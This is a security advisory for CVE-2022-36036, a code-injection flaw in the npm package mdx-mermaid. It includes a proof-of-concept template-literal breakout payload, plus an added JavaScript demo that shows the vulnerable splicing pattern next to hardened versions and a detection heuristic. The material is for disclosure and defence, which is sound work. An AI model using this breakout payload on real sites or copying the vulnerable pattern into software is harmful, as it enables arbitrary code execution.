Headline
CVE-2022-36036: Improper Control of Generation of Code ('Code Injection') in mdx-mermaid
mdx-mermaid provides plug-and-play access to Mermaid in MDX. Versions earlier than 1.3.0, and version 2.0.0-rc1, are vulnerable to arbitrary JavaScript injection: modify any mermaid code block to contain arbitrary code and it will execute when the component is loaded by MDXjs. This vulnerability was patched in versions 1.3.0 and 2.0.0-rc2. There are currently no known workarounds.
Package
npm mdx-mermaid (npm)
Affected versions
0.0.1, 1.0.0, 1.1.0, 1.1.1, 1.2.0, 1.2.1, 1.2.2, 1.2.3, 2.0.0-rc1
Patched versions
1.3.0, 2.0.0-rc2
Impact
Arbitrary JavaScript injection
Modify any mermaid code block so that it contains the following text, and the JavaScript placed inside the function will execute when the component is loaded by MDXjs:
```
` + (function () {
// Put JavaScript code here
return ''
}()) + `
```
The block below shows a valid mermaid code block:
```mermaid
graph TD;
A-->B;
A-->C;
B-->D;
C-->D;
```
The same block but with the exploit added:
```mermaid
` + (function () { alert('vulnerable') return '' }()) + `
graph TD;
A-->B;
A-->C;
B-->D;
C-->D;
```
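The shape of the payload above (a closing backtick, a concatenated function call, an opening backtick) only works if the diagram text is being spliced verbatim into a JavaScript template literal that is later evaluated. The following is an added example and not mdx-mermaid's own code; it assumes that mechanism in order to show the vulnerable pattern next to two hardened forms (serialising the text with `JSON.stringify`, or escaping the sequences that can terminate a template literal) and a cheap check a content pipeline can run over incoming blocks. The `BENIGN` and `HOSTILE` inputs are constructed for the demonstration; the hostile one sets a flag instead of calling `alert` so the effect is observable in a test.

```javascript
// Added example, not mdx-mermaid's code. Assumption: the mermaid block text is
// interpolated into generated JavaScript source that is later executed.

// Vulnerable pattern: splice the diagram text straight into a template literal.
// Any backtick in the diagram closes the literal and the rest becomes live code.
function buildComponentSourceVulnerable(diagram) {
  return 'const chart = `' + diagram + '`;\nreturn chart;';
}

// Hardened pattern: serialise the text as a JSON string literal. JSON.stringify
// escapes backslashes, quotes and newlines, so no input can close the literal early.
function buildComponentSourceSafe(diagram) {
  return 'const chart = ' + JSON.stringify(diagram) + ';\nreturn chart;';
}

// Alternative when a template literal must be kept: escape backslashes first, then
// the two sequences that end or interpolate inside a template literal.
function escapeForTemplateLiteral(s) {
  return s
    .replace(/\\/g, '\\\\')
    .replace(/`/g, '\\`')
    .replace(/\$\{/g, '\\${');
}

// Run generated source the way a bundler-produced module body would be run.
function evaluate(source) {
  return new Function(source)(); // eslint-disable-line no-new-func
}

// Detection heuristic for a content pipeline: a mermaid diagram has no legitimate
// use for a backtick or "${", so either one in a block is worth flagging.
function looksLikeBreakout(diagram) {
  return /`|\$\{/.test(diagram);
}

// Constructed sample inputs.
const BENIGN = 'graph TD;\nA-->B;\nA-->C;\nB-->D;\nC-->D;';
// Same shape as the advisory's payload, with a flag in place of alert().
const HOSTILE =
  "` + (function () { globalThis.__injected = true; return '' }()) + `\ngraph TD;\nA-->B;";

// Compare the three builders on both inputs and report whether the flag was set.
function demonstrate() {
  const results = {};
  for (const [name, build] of [
    ['vulnerable', buildComponentSourceVulnerable],
    ['json', buildComponentSourceSafe],
    ['escaped', (d) => 'const chart = `' + escapeForTemplateLiteral(d) + '`;\nreturn chart;'],
  ]) {
    delete globalThis.__injected;
    const output = evaluate(build(HOSTILE));
    results[name] = {
      preserved: output === HOSTILE,          // did the diagram text survive intact?
      codeRan: globalThis.__injected === true, // did the injected function execute?
    };
  }
  delete globalThis.__injected;
  results.flagged = { benign: looksLikeBreakout(BENIGN), hostile: looksLikeBreakout(HOSTILE) };
  return results;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demonstrate(), null, 2));
}
```

Running it shows the vulnerable builder both executing the injected function and losing the payload text, while the two hardened builders return the block contents unchanged and run nothing. The heuristic is a triage aid, not a fix: the correct repair is to stop treating diagram text as source code, which is what the serialising builder does.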
Patches
1.3.0 and 2.0.0-rc2
Workarounds
None known
References
None
For more information
N/A